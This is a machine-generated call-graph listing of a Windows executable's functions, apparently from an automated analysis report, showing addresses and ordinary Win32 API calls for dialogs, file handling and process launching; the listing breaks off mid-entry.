26328->26330 26329->26321 26347 7ff6c0359d78 33 API calls 26329->26347 26333 7ff6c036d5e1 26332->26333 26334 7ff6c036d47e 26332->26334 26336 7ff6c036cb3c 26333->26336 26334->26333 26335 7ff6c0351744 33 API calls 26334->26335 26335->26334 26337 7ff6c036cb72 26336->26337 26344 7ff6c036cc3c 26336->26344 26338 7ff6c036cb82 26337->26338 26341 7ff6c036cc37 26337->26341 26343 7ff6c036cbdc 26337->26343 26338->26322 26348 7ff6c0351f80 33 API calls 3 library calls 26341->26348 26343->26338 26345 7ff6c0382150 33 API calls 26343->26345 26349 7ff6c0352004 33 API calls std::_Xinvalid_argument 26344->26349 26345->26338 26346->26322 26347->26321 26348->26344 26351 7ff6c037adbc GetMessageW 26350->26351 26352 7ff6c037ae00 GetDlgItem 26350->26352 26353 7ff6c037addb IsDialogMessageW 26351->26353 26354 7ff6c037adea TranslateMessage DispatchMessageW 26351->26354 26352->25820 26352->25821 26353->26352 26353->26354 26354->26352 26355->25842 26356->25840 26358 7ff6c035713b 26357->26358 26359 7ff6c0357206 26357->26359 26364 7ff6c035714b memcpy_s 26358->26364 26366 7ff6c0353f48 33 API calls 2 library calls 26358->26366 26367 7ff6c035704c 47 API calls memcpy_s 26359->26367 26362 7ff6c0357273 26362->25858 26363 7ff6c035720b 26363->26362 26368 7ff6c035889c 8 API calls memcpy_s 26363->26368 26364->25858 26366->26364 26367->26363 26368->26363 26370 7ff6c0366a0b 26369->26370 26386 7ff6c0366a04 26369->26386 26372 7ff6c035129c 33 API calls 26370->26372 26371 7ff6c03822a0 _handle_error 8 API calls 26373 7ff6c03621c9 26371->26373 26374 7ff6c0366a36 26372->26374 26373->25874 26373->25875 26375 7ff6c0366c87 26374->26375 26376 7ff6c0366a56 26374->26376 26377 7ff6c036629c 35 API calls 26375->26377 26378 7ff6c0366a70 26376->26378 26400 7ff6c0366b09 26376->26400 26381 7ff6c0366ca6 26377->26381 26379 7ff6c036706b 26378->26379 26442 7ff6c035c0a8 33 API calls 2 library calls 26378->26442 26450 7ff6c0352004 33 API calls std::_Xinvalid_argument 26379->26450 26380 7ff6c0366eaf 26426 7ff6c036708f 26380->26426 26447 7ff6c035c0a8 33 API calls 2 library calls 26380->26447 26381->26380 26383 7ff6c0366cdb 26381->26383 26387 7ff6c0366b04 26381->26387 26390 7ff6c036707d 26383->26390 26445 7ff6c035c0a8 33 API calls 2 library calls 26383->26445 26384 7ff6c0367071 26398 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26384->26398 26386->26371 26387->26384 26387->26386 26391 7ff6c0367095 26387->26391 26394 7ff6c0367066 26387->26394 26388 7ff6c0366ac3 26401 7ff6c0351fa0 31 API calls 26388->26401 26408 7ff6c0366ad5 memcpy_s 26388->26408 26451 7ff6c0352004 33 API calls std::_Xinvalid_argument 26390->26451 26393 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26391->26393 26399 7ff6c036709b 26393->26399 26405 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26394->26405 26395 7ff6c0366f16 26448 7ff6c03511cc 33 API calls memcpy_s 26395->26448 26406 7ff6c0367077 26398->26406 26412 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26399->26412 26400->26387 26407 7ff6c035129c 33 API calls 26400->26407 26401->26408 26403 7ff6c0367083 26415 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26403->26415 26404 7ff6c0351fa0 31 API calls 26404->26387 26405->26379 26410 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26406->26410 26413 7ff6c0366b7e 26407->26413 26408->26404 26409 7ff6c0366f29 26449 7ff6c036576c 33 API calls memcpy_s 26409->26449 26410->26390 26411 7ff6c0351fa0 31 API calls 26416 7ff6c0366db5 26411->26416 26417 7ff6c03670a1 26412->26417 26443 7ff6c03657e0 33 API calls 26413->26443 26419 7ff6c0367089 26415->26419 26429 7ff6c0366de1 26416->26429 26446 7ff6c0351744 33 API calls 4 library calls 26416->26446 26452 7ff6c035704c 47 API calls memcpy_s 26419->26452 26420 7ff6c0366d36 memcpy_s 26420->26403 26420->26411 26421 7ff6c0366b93 26444 7ff6c035e174 33 API calls 2 library calls 26421->26444 26422 7ff6c0351fa0 31 API calls 26425 7ff6c0366fac 26422->26425 26428 7ff6c0351fa0 31 API calls 26425->26428 26453 7ff6c0352004 33 API calls std::_Xinvalid_argument 26426->26453 26427 7ff6c0366f39 memcpy_s 26427->26399 26427->26422 26431 7ff6c0366fb6 26428->26431 26429->26419 26435 7ff6c035129c 33 API calls 26429->26435 26430 7ff6c0351fa0 31 API calls 26433 7ff6c0366c2d 26430->26433 26434 7ff6c0351fa0 31 API calls 26431->26434 26436 7ff6c0351fa0 31 API calls 26433->26436 26434->26387 26437 7ff6c0366e82 26435->26437 26436->26387 26439 7ff6c0352034 33 API calls 26437->26439 26438 7ff6c0366ba9 memcpy_s 26438->26406 26438->26430 26440 7ff6c0366e9f 26439->26440 26441 7ff6c0351fa0 31 API calls 26440->26441 26441->26387 26442->26388 26443->26421 26444->26438 26445->26420 26446->26429 26447->26395 26448->26409 26449->26427 26452->26426 26455 7ff6c03620c2 26454->26455 26456 7ff6c03620aa 26454->26456 26457 7ff6c03620e6 26455->26457 26460 7ff6c035b554 99 API calls 26455->26460 26456->26455 26458 7ff6c03620b6 CloseHandle 26456->26458 26457->25882 26458->26455 26460->26457 26462 7ff6c037a9b6 26461->26462 26463 7ff6c037a9af 26461->26463 26462->26463 26615 7ff6c0351744 33 API calls 4 library calls 26462->26615 26463->25898 26465->25898 26467 7ff6c037a686 26466->26467 26468 7ff6c037a3ff 26466->26468 26469 7ff6c03822a0 _handle_error 8 API calls 26467->26469 26616 7ff6c037cd78 33 API calls 26468->26616 26472 7ff6c037a697 26469->26472 26471 7ff6c037a41e 26473 7ff6c035129c 33 API calls 26471->26473 26472->25967 26474 7ff6c037a45e 26473->26474 26475 7ff6c035129c 33 API calls 26474->26475 26476 7ff6c037a497 26475->26476 26477 7ff6c035129c 33 API calls 26476->26477 26478 7ff6c037a4ca 26477->26478 26617 7ff6c037a7b4 33 API calls _invalid_parameter_noinfo_noreturn 26478->26617 26480 7ff6c037a6b4 26481 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26480->26481 26482 7ff6c037a6ba 26481->26482 26484 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26482->26484 26483 7ff6c037a4f3 26483->26480 26483->26482 26485 7ff6c037a6c0 26483->26485 26486 7ff6c03520b0 33 API calls 26483->26486 26489 7ff6c037a605 26483->26489 26484->26485 26487 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26485->26487 26486->26489 26488 7ff6c037a6c6 26487->26488 26491 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26488->26491 26489->26467 26489->26488 26490 7ff6c037a6af 26489->26490 26493 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26490->26493 26492 7ff6c037a6cc 26491->26492 26494 7ff6c035255c 61 API calls 26492->26494 26493->26480 26495 7ff6c037a715 26494->26495 26496 7ff6c037a731 26495->26496 26497 7ff6c037a781 SetDlgItemTextW 26495->26497 26501 7ff6c037a721 26495->26501 26498 7ff6c03822a0 _handle_error 8 API calls 26496->26498 26497->26496 26499 7ff6c037a7a7 26498->26499 26499->25967 26500 7ff6c037a72d 26500->26496 26502 7ff6c037a737 EndDialog 26500->26502 26501->26496 26501->26500 26618 7ff6c036babc 26501->26618 26502->26496 26510 7ff6c037f4a9 __scrt_get_show_window_mode 26504->26510 26522 7ff6c037f7fd 26504->26522 26505 7ff6c0351fa0 31 API calls 26506 7ff6c037f81c 26505->26506 26507 7ff6c03822a0 _handle_error 8 API calls 26506->26507 26508 7ff6c037f828 26507->26508 26508->25975 26509 7ff6c037f604 26512 7ff6c035129c 33 API calls 26509->26512 26510->26509 26637 7ff6c0371344 CompareStringW 26510->26637 26513 7ff6c037f640 26512->26513 26514 7ff6c0363268 51 API calls 26513->26514 26515 7ff6c037f64a 26514->26515 26516 7ff6c0351fa0 31 API calls 26515->26516 26519 7ff6c037f655 26516->26519 26517 7ff6c037f6c2 ShellExecuteExW 26518 7ff6c037f7c6 26517->26518 26524 7ff6c037f6d5 26517->26524 26518->26522 26526 7ff6c037f87b 26518->26526 26519->26517 26521 7ff6c035129c 33 API calls 26519->26521 26520 7ff6c037f70e 26639 7ff6c037fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26520->26639 26525 7ff6c037f697 26521->26525 26522->26505 26523 7ff6c037f763 CloseHandle 26527 7ff6c037f781 26523->26527 26528 7ff6c037f772 26523->26528 26524->26520 26524->26523 26533 7ff6c037f701 ShowWindow 26524->26533 26638 7ff6c0365b20 53 API calls 2 library calls 26525->26638 26530 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26526->26530 26527->26518 26538 7ff6c037f7b7 ShowWindow 26527->26538 26640 7ff6c0371344 CompareStringW 26528->26640 26531 7ff6c037f880 26530->26531 26533->26520 26535 7ff6c037f6a5 26537 7ff6c0351fa0 31 API calls 26535->26537 26536 7ff6c037f726 26536->26523 26540 7ff6c037f734 GetExitCodeProcess 26536->26540 26539 7ff6c037f6af 26537->26539 26538->26518 26539->26517 26540->26523 26541 7ff6c037f747 26540->26541 26541->26523 26542->25898 26543->25898 26544->25898 26545->25898 26546->25898 26547->25898 26548->25898 26549->25898 26550->25898 26552 7ff6c0363d1b 26551->26552 26553 7ff6c0363d1e SetFileAttributesW 26551->26553 26552->26553 26554 7ff6c0363d34 26553->26554 26561 7ff6c0363db5 26553->26561 26556 7ff6c03669cc 49 API calls 26554->26556 26555 7ff6c03822a0 _handle_error 8 API calls 26557 7ff6c0363dca 26555->26557 26558 7ff6c0363d59 26556->26558 26557->25898 26559 7ff6c0363d5d SetFileAttributesW 26558->26559 26560 7ff6c0363d7c 26558->26560 26559->26560 26560->26561 26562 7ff6c0363dda 26560->26562 26561->26555 26563 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26562->26563 26564 7ff6c0363ddf 26563->26564 26565->25898 26567 7ff6c03672aa 26566->26567 26641 7ff6c035b3b8 26567->26641 26570->25898 26572 7ff6c03631a7 DeleteFileW 26571->26572 26573 7ff6c03631a4 26571->26573 26574 7ff6c03631bd 26572->26574 26575 7ff6c036323c 26572->26575 26573->26572 26576 7ff6c03669cc 49 API calls 26574->26576 26577 7ff6c03822a0 _handle_error 8 API calls 26575->26577 26578 7ff6c03631e2 26576->26578 26579 7ff6c0363251 26577->26579 26580 7ff6c03631e6 DeleteFileW 26578->26580 26581 7ff6c0363203 26578->26581 26579->25898 26580->26581 26581->26575 26582 7ff6c0363261 26581->26582 26583 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26582->26583 26584 7ff6c0363266 26583->26584 26586->25898 26587->25898 26588->25898 26589->25898 26591 7ff6c0367dcc 26590->26591 26592 7ff6c0367de3 26591->26592 26593 7ff6c0367e15 26591->26593 26595 7ff6c035129c 33 API calls 26592->26595 26645 7ff6c035704c 47 API calls memcpy_s 26593->26645 26597 7ff6c0367e07 26595->26597 26596 7ff6c0367e1a 26597->25898 26598->25898 26599->25898 26602 7ff6c036d21a 26600->26602 26601 7ff6c036d24d 26601->26025 26602->26601 26603 7ff6c0351744 33 API calls 26602->26603 26603->26602 26604->25922 26605->25926 26607->25892 26608->25895 26609->25899 26610->25950 26611->25940 26613->25943 26615->26462 26616->26471 26617->26483 26619 7ff6c036badb 26618->26619 26620 7ff6c036bb17 26619->26620 26622 7ff6c036b928 26619->26622 26620->26500 26623 7ff6c036b952 memcpy_s 26622->26623 26625 7ff6c036b9f8 26623->26625 26626 7ff6c036b9c4 GetProcAddressForCaller GetProcAddress 26623->26626 26624 7ff6c036ba86 GetCurrentProcessId 26627 7ff6c036ba67 26624->26627 26625->26624 26628 7ff6c036ba2a 26625->26628 26626->26625 26627->26620 26628->26627 26634 7ff6c035b67c 99 API calls _handle_error 26628->26634 26630 7ff6c036ba52 26635 7ff6c035ba60 99 API calls 3 library calls 26630->26635 26632 7ff6c036ba5a 26636 7ff6c035b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 26632->26636 26634->26630 26635->26632 26636->26627 26637->26509 26638->26535 26639->26536 26640->26527 26643 7ff6c035b402 __scrt_get_show_window_mode 26641->26643 26642 7ff6c03822a0 _handle_error 8 API calls 26644 7ff6c035b4c6 26642->26644 26643->26642 26644->25898 26645->26596 26680 7ff6c03686ac 26646->26680 26648 7ff6c035e3d4 26686 7ff6c035e610 31 API calls memcpy_s 26648->26686 26650 7ff6c035e4e4 26651 7ff6c0382150 33 API calls 26650->26651 26654 7ff6c035e500 26651->26654 26652 7ff6c035e559 26655 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26652->26655 26653 7ff6c035e464 26653->26650 26653->26652 26687 7ff6c03730c8 102 API calls 26654->26687 26656 7ff6c035e55e 26655->26656 26659 7ff6c03618c5 26656->26659 26661 7ff6c036187a 26656->26661 26663 7ff6c0351fa0 31 API calls 26656->26663 26658 7ff6c035e52d 26660 7ff6c03822a0 _handle_error 8 API calls 26658->26660 26659->26041 26662 7ff6c035e53d 26660->26662 26661->26659 26664 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26661->26664 26662->26041 26663->26656 26665 7ff6c03618f3 26664->26665 26668 7ff6c035e7fa 26666->26668 26667 7ff6c035e8b1 26678 7ff6c035e910 26667->26678 26695 7ff6c035f588 26667->26695 26668->26667 26669 7ff6c035e874 26668->26669 26688 7ff6c0363e88 26668->26688 26669->26667 26671 7ff6c035e9a3 26669->26671 26672 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26671->26672 26675 7ff6c035e9a8 26672->26675 26673 7ff6c035e965 26674 7ff6c03822a0 _handle_error 8 API calls 26673->26674 26677 7ff6c035e98e 26674->26677 26677->26043 26678->26673 26731 7ff6c03528a4 82 API calls 2 library calls 26678->26731 26681 7ff6c03686ca 26680->26681 26682 7ff6c0382150 33 API calls 26681->26682 26684 7ff6c03686ef 26682->26684 26683 7ff6c0382150 33 API calls 26685 7ff6c0368719 26683->26685 26684->26683 26685->26648 26686->26653 26687->26658 26689 7ff6c036728c 8 API calls 26688->26689 26690 7ff6c0363ea1 26689->26690 26694 7ff6c0363ecf 26690->26694 26732 7ff6c036407c 26690->26732 26693 7ff6c0363eba FindClose 26693->26694 26694->26668 26696 7ff6c035f5a8 _snwprintf 26695->26696 26771 7ff6c0352950 26696->26771 26699 7ff6c035f5dc 26704 7ff6c035f60c 26699->26704 26786 7ff6c03533e4 26699->26786 26702 7ff6c035f608 26702->26704 26818 7ff6c0353ad8 26702->26818 27034 7ff6c0352c54 26704->27034 26710 7ff6c035f7db 26828 7ff6c035f8b4 26710->26828 26711 7ff6c0358d04 33 API calls 26713 7ff6c035f672 26711->26713 27054 7ff6c03678d8 48 API calls 2 library calls 26713->27054 26715 7ff6c035f687 26716 7ff6c0363e88 55 API calls 26715->26716 26721 7ff6c035f6bd 26716->26721 26718 7ff6c035f852 26718->26704 26849 7ff6c03569f8 26718->26849 26860 7ff6c035f940 26718->26860 26724 7ff6c035f8aa 26721->26724 26725 7ff6c035f75d 26721->26725 26726 7ff6c0363e88 55 API calls 26721->26726 27055 7ff6c03678d8 48 API calls 2 library calls 26721->27055 26727 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26724->26727 26725->26710 26725->26724 26728 7ff6c035f8a5 26725->26728 26726->26721 26730 7ff6c035f8b0 26727->26730 26729 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26728->26729 26729->26724 26731->26673 26733 7ff6c03640b9 FindFirstFileW 26732->26733 26734 7ff6c0364192 FindNextFileW 26732->26734 26736 7ff6c03641b3 26733->26736 26738 7ff6c03640de 26733->26738 26734->26736 26737 7ff6c03641a1 GetLastError 26734->26737 26739 7ff6c03641d1 26736->26739 26741 7ff6c03520b0 33 API calls 26736->26741 26757 7ff6c0364180 26737->26757 26740 7ff6c03669cc 49 API calls 26738->26740 26744 7ff6c035129c 33 API calls 26739->26744 26743 7ff6c0364104 26740->26743 26741->26739 26742 7ff6c03822a0 _handle_error 8 API calls 26745 7ff6c0363eb4 26742->26745 26746 7ff6c0364127 26743->26746 26747 7ff6c0364108 FindFirstFileW 26743->26747 26748 7ff6c03641fb 26744->26748 26745->26693 26745->26694 26746->26736 26749 7ff6c036416f GetLastError 26746->26749 26751 7ff6c03642d4 26746->26751 26747->26746 26758 7ff6c0368050 26748->26758 26749->26757 26753 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26751->26753 26754 7ff6c03642da 26753->26754 26755 7ff6c03642cf 26756 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26755->26756 26756->26751 26757->26742 26759 7ff6c0368065 26758->26759 26762 7ff6c0368148 26759->26762 26761 7ff6c0364209 26761->26755 26761->26757 26763 7ff6c03682e6 26762->26763 26766 7ff6c036817a 26762->26766 26770 7ff6c035704c 47 API calls memcpy_s 26763->26770 26765 7ff6c03682eb 26768 7ff6c0368194 memcpy_s 26766->26768 26769 7ff6c0365864 33 API calls 2 library calls 26766->26769 26768->26761 26769->26768 26770->26765 26772 7ff6c035296c 26771->26772 26773 7ff6c03686ac 33 API calls 26772->26773 26774 7ff6c035298d 26773->26774 26775 7ff6c0382150 33 API calls 26774->26775 26779 7ff6c0352ac2 26774->26779 26777 7ff6c0352ab0 26775->26777 26777->26779 27056 7ff6c03591c8 26777->27056 27063 7ff6c0364cc4 26779->27063 26781 7ff6c0362c68 27095 7ff6c0362480 26781->27095 26783 7ff6c0362c85 26783->26699 27114 7ff6c0362890 26786->27114 26787 7ff6c0353674 27133 7ff6c03528a4 82 API calls 2 library calls 26787->27133 26788 7ff6c0353431 __scrt_get_show_window_mode 26796 7ff6c035344e 26788->26796 26799 7ff6c0353601 26788->26799 27119 7ff6c0362b70 26788->27119 26790 7ff6c03569f8 132 API calls 26792 7ff6c0353682 26790->26792 26792->26790 26793 7ff6c035370c 26792->26793 26792->26799 26812 7ff6c0362a60 101 API calls 26792->26812 26798 7ff6c0353740 26793->26798 26793->26799 27134 7ff6c03528a4 82 API calls 2 library calls 26793->27134 26795 7ff6c03535cb 26795->26796 26797 7ff6c03535d7 26795->26797 26796->26787 26796->26792 26797->26799 26801 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26797->26801 26798->26799 26800 7ff6c035384d 26798->26800 26814 7ff6c0362b70 101 API calls 26798->26814 26799->26702 26800->26799 26803 7ff6c03520b0 33 API calls 26800->26803 26804 7ff6c0353891 26801->26804 26802 7ff6c03534eb 26802->26795 27128 7ff6c0362a60 26802->27128 26803->26799 26804->26702 26806 7ff6c03569f8 132 API calls 26807 7ff6c035378e 26806->26807 26807->26806 26808 7ff6c0353803 26807->26808 26815 7ff6c0362a60 101 API calls 26807->26815 26810 7ff6c0362a60 101 API calls 26808->26810 26810->26800 26811 7ff6c0362890 104 API calls 26811->26802 26812->26792 26813 7ff6c0362890 104 API calls 26813->26795 26814->26807 26815->26807 26819 7ff6c0353b55 26818->26819 26820 7ff6c0353af9 26818->26820 26821 7ff6c03822a0 _handle_error 8 API calls 26819->26821 27146 7ff6c0353378 26820->27146 26823 7ff6c0353b67 26821->26823 26823->26710 26823->26711 26825 7ff6c0353b6c 26826 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26826 26827 7ff6c0353b71 26826->26827 27373 7ff6c036882c 26828->27373 26830 7ff6c035f8ca 27377 7ff6c036eee0 GetSystemTime SystemTimeToFileTime 26830->27377 26833 7ff6c0370914 26834 7ff6c03802c0 26833->26834 26835 7ff6c0367db4 47 API calls 26834->26835 26836 7ff6c03802f3 26835->26836 26837 7ff6c036aaa0 48 API calls 26836->26837 26838 7ff6c0380307 26837->26838 26839 7ff6c036da14 48 API calls 26838->26839 26840 7ff6c0380317 26839->26840 26841 7ff6c0351fa0 31 API calls 26840->26841 26842 7ff6c0380322 26841->26842 27386 7ff6c037fbe8 49 API calls 2 library calls 26842->27386 26844 7ff6c0380338 26845 7ff6c0351fa0 31 API calls 26844->26845 26846 7ff6c0380343 26845->26846 26847 7ff6c03822a0 _handle_error 8 API calls 26846->26847 26848 7ff6c0380350 26847->26848 26848->26718 26850 7ff6c0356a0a 26849->26850 26851 7ff6c0356a0e 26849->26851 26850->26718 26859 7ff6c0362b70 101 API calls 26851->26859 26852 7ff6c0356a1b 26853 7ff6c0356a3e 26852->26853 26854 7ff6c0356a2f 26852->26854 27449 7ff6c0355138 130 API calls 2 library calls 26853->27449 26854->26850 27387 7ff6c0355e2c 26854->27387 26857 7ff6c0356a3c 26857->26850 27450 7ff6c035466c 82 API calls 26857->27450 26859->26852 26861 7ff6c035f988 26860->26861 26867 7ff6c035f9c0 26861->26867 26919 7ff6c035fa44 26861->26919 27565 7ff6c03760ac 137 API calls 3 library calls 26861->27565 26863 7ff6c0361141 26864 7ff6c0361146 26863->26864 26865 7ff6c0361199 26863->26865 26864->26919 27613 7ff6c035dd18 179 API calls 26864->27613 26865->26919 27614 7ff6c03760ac 137 API calls 3 library calls 26865->27614 26866 7ff6c03822a0 _handle_error 8 API calls 26868 7ff6c036117c 26866->26868 26867->26863 26871 7ff6c035f9e0 26867->26871 26867->26919 26868->26718 26871->26919 27480 7ff6c0359bb0 26871->27480 26873 7ff6c035fae6 27493 7ff6c0365eb8 26873->27493 26876 7ff6c035fb8a 27033 7ff6c0362a60 101 API calls 26876->27033 26878 7ff6c035fb6e 26878->26876 27567 7ff6c0367c54 47 API calls 2 library calls 26878->27567 26880 7ff6c035fd27 26886 7ff6c035fdcc 26880->26886 26887 7ff6c035fde9 26880->26887 26891 7ff6c0360f9e 26880->26891 26882 7ff6c035fcda 27568 7ff6c0365a68 33 API calls 26882->27568 26885 7ff6c035fbe7 26885->26880 26885->26882 26889 7ff6c03520b0 33 API calls 26885->26889 26889->26882 26919->26866 27033->26885 27036 7ff6c0352c74 27034->27036 27038 7ff6c0352c88 27034->27038 27035 7ff6c0351fa0 31 API calls 27040 7ff6c0352ca1 27035->27040 27036->27038 27708 7ff6c0352d80 108 API calls _invalid_parameter_noinfo_noreturn 27036->27708 27038->27035 27041 7ff6c0352d64 27040->27041 27692 7ff6c0353090 31 API calls _invalid_parameter_noinfo_noreturn 27040->27692 27043 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27041->27043 27042 7ff6c0352d08 27693 7ff6c0353090 31 API calls _invalid_parameter_noinfo_noreturn 27042->27693 27045 7ff6c0352d7c 27043->27045 27046 7ff6c0352d14 27047 7ff6c0351fa0 31 API calls 27046->27047 27048 7ff6c0352d20 27047->27048 27694 7ff6c036874c 27048->27694 27054->26715 27055->26721 27073 7ff6c0365664 27056->27073 27058 7ff6c03591df 27076 7ff6c036b744 27058->27076 27062 7ff6c0359383 27062->26779 27064 7ff6c0364cf2 __scrt_get_show_window_mode 27063->27064 27091 7ff6c0364b6c 27064->27091 27066 7ff6c0364d14 27067 7ff6c0364d50 27066->27067 27069 7ff6c0364d6e 27066->27069 27068 7ff6c03822a0 _handle_error 8 API calls 27067->27068 27070 7ff6c0352b32 27068->27070 27071 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27069->27071 27070->26699 27070->26781 27072 7ff6c0364d73 27071->27072 27082 7ff6c03656a8 27073->27082 27077 7ff6c03513a4 33 API calls 27076->27077 27078 7ff6c0359365 27077->27078 27079 7ff6c0359a28 27078->27079 27080 7ff6c03656a8 2 API calls 27079->27080 27081 7ff6c0359a36 27080->27081 27081->27062 27083 7ff6c03656be __scrt_get_show_window_mode 27082->27083 27086 7ff6c036eb20 27083->27086 27089 7ff6c036ead4 GetCurrentProcess GetProcessAffinityMask 27086->27089 27090 7ff6c036569e 27089->27090 27090->27058 27092 7ff6c0364be7 27091->27092 27094 7ff6c0364bef memcpy_s 27091->27094 27093 7ff6c0351fa0 31 API calls 27092->27093 27093->27094 27094->27066 27096 7ff6c03624bd CreateFileW 27095->27096 27098 7ff6c036256e GetLastError 27096->27098 27107 7ff6c036262e 27096->27107 27099 7ff6c03669cc 49 API calls 27098->27099 27100 7ff6c036259c 27099->27100 27101 7ff6c03625a0 CreateFileW GetLastError 27100->27101 27106 7ff6c03625ec 27100->27106 27101->27106 27102 7ff6c0362671 SetFileTime 27105 7ff6c036268f 27102->27105 27103 7ff6c03626c8 27104 7ff6c03822a0 _handle_error 8 API calls 27103->27104 27108 7ff6c03626db 27104->27108 27105->27103 27109 7ff6c03520b0 33 API calls 27105->27109 27106->27107 27110 7ff6c03626f6 27106->27110 27107->27102 27107->27105 27108->26783 27113 7ff6c035b7f8 99 API calls 2 library calls 27108->27113 27109->27103 27111 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27110->27111 27112 7ff6c03626fb 27111->27112 27113->26783 27115 7ff6c03628b6 27114->27115 27117 7ff6c03628bd 27114->27117 27115->26788 27117->27115 27118 7ff6c03622e0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27117->27118 27135 7ff6c035b8b4 99 API calls Concurrency::cancel_current_task 27117->27135 27118->27117 27120 7ff6c0362ba9 27119->27120 27121 7ff6c0362b8d 27119->27121 27122 7ff6c03534cc 27120->27122 27124 7ff6c0362bc1 SetFilePointer 27120->27124 27121->27122 27136 7ff6c035b9d4 99 API calls Concurrency::cancel_current_task 27121->27136 27122->26811 27124->27122 27125 7ff6c0362bde GetLastError 27124->27125 27125->27122 27126 7ff6c0362be8 27125->27126 27126->27122 27137 7ff6c035b9d4 99 API calls Concurrency::cancel_current_task 27126->27137 27138 7ff6c0362738 27128->27138 27131 7ff6c03535a7 27131->26795 27131->26813 27133->26799 27134->26798 27139 7ff6c0362749 _snwprintf 27138->27139 27140 7ff6c0362850 SetFilePointer 27139->27140 27144 7ff6c0362775 27139->27144 27142 7ff6c0362878 GetLastError 27140->27142 27140->27144 27141 7ff6c03822a0 _handle_error 8 API calls 27143 7ff6c03627dd 27141->27143 27142->27144 27143->27131 27145 7ff6c035b9d4 99 API calls Concurrency::cancel_current_task 27143->27145 27144->27141 27147 7ff6c035339a 27146->27147 27148 7ff6c0353396 27146->27148 27152 7ff6c0353294 27147->27152 27148->26819 27148->26825 27151 7ff6c0362a60 101 API calls 27151->27148 27153 7ff6c03532f6 27152->27153 27154 7ff6c03532bb 27152->27154 27160 7ff6c0356e74 27153->27160 27155 7ff6c03569f8 132 API calls 27154->27155 27158 7ff6c03532db 27155->27158 27158->27151 27164 7ff6c0356e95 27160->27164 27161 7ff6c03569f8 132 API calls 27161->27164 27162 7ff6c035331d 27162->27158 27165 7ff6c0353904 27162->27165 27164->27161 27164->27162 27192 7ff6c036e784 27164->27192 27200 7ff6c0356a7c 27165->27200 27168 7ff6c035396a 27172 7ff6c035399a 27168->27172 27173 7ff6c0353989 27168->27173 27169 7ff6c0353a8a 27174 7ff6c03822a0 _handle_error 8 API calls 27169->27174 27171 7ff6c035394f 27171->27169 27175 7ff6c0353ab3 27171->27175 27182 7ff6c0353ab8 27171->27182 27178 7ff6c03539ec 27172->27178 27179 7ff6c03539a3 27172->27179 27233 7ff6c0370cd4 33 API calls 27173->27233 27177 7ff6c0353a9e 27174->27177 27180 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27175->27180 27177->27158 27235 7ff6c03526b4 33 API calls memcpy_s 27178->27235 27234 7ff6c0370c00 33 API calls 27179->27234 27180->27182 27187 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27182->27187 27183 7ff6c03539b0 27188 7ff6c0351fa0 31 API calls 27183->27188 27191 7ff6c03539c0 memcpy_s 27183->27191 27185 7ff6c0351fa0 31 API calls 27185->27171 27186 7ff6c0353a13 27236 7ff6c0370a68 34 API calls _invalid_parameter_noinfo_noreturn 27186->27236 27190 7ff6c0353abe 27187->27190 27188->27191 27191->27185 27193 7ff6c036e78d 27192->27193 27194 7ff6c036e7a7 27193->27194 27198 7ff6c035b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27193->27198 27195 7ff6c036e7c1 SetThreadExecutionState 27194->27195 27199 7ff6c035b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27194->27199 27198->27194 27199->27195 27201 7ff6c0356a96 _snwprintf 27200->27201 27202 7ff6c0356ae4 27201->27202 27203 7ff6c0356ac4 27201->27203 27205 7ff6c0356d4d 27202->27205 27208 7ff6c0356b0f 27202->27208 27275 7ff6c03528a4 82 API calls 2 library calls 27203->27275 27304 7ff6c03528a4 82 API calls 2 library calls 27205->27304 27207 7ff6c0356ad0 27209 7ff6c03822a0 _handle_error 8 API calls 27207->27209 27208->27207 27237 7ff6c0371f14 27208->27237 27210 7ff6c035394b 27209->27210 27210->27168 27210->27171 27232 7ff6c0352794 33 API calls __std_swap_ranges_trivially_swappable 27210->27232 27213 7ff6c0356b85 27216 7ff6c0356c2a 27213->27216 27231 7ff6c0356b7b 27213->27231 27281 7ff6c0368928 109 API calls 27213->27281 27214 7ff6c0356b6e 27276 7ff6c03528a4 82 API calls 2 library calls 27214->27276 27215 7ff6c0356b80 27215->27213 27277 7ff6c03540b0 27215->27277 27246 7ff6c0364720 27216->27246 27222 7ff6c0356c52 27223 7ff6c0356cc7 27222->27223 27224 7ff6c0356cd1 27222->27224 27250 7ff6c036174c 27223->27250 27282 7ff6c0371ea0 27224->27282 27227 7ff6c0356ccf 27302 7ff6c03646c0 8 API calls _handle_error 27227->27302 27229 7ff6c0356cfd 27229->27231 27303 7ff6c035433c 82 API calls 2 library calls 27229->27303 27265 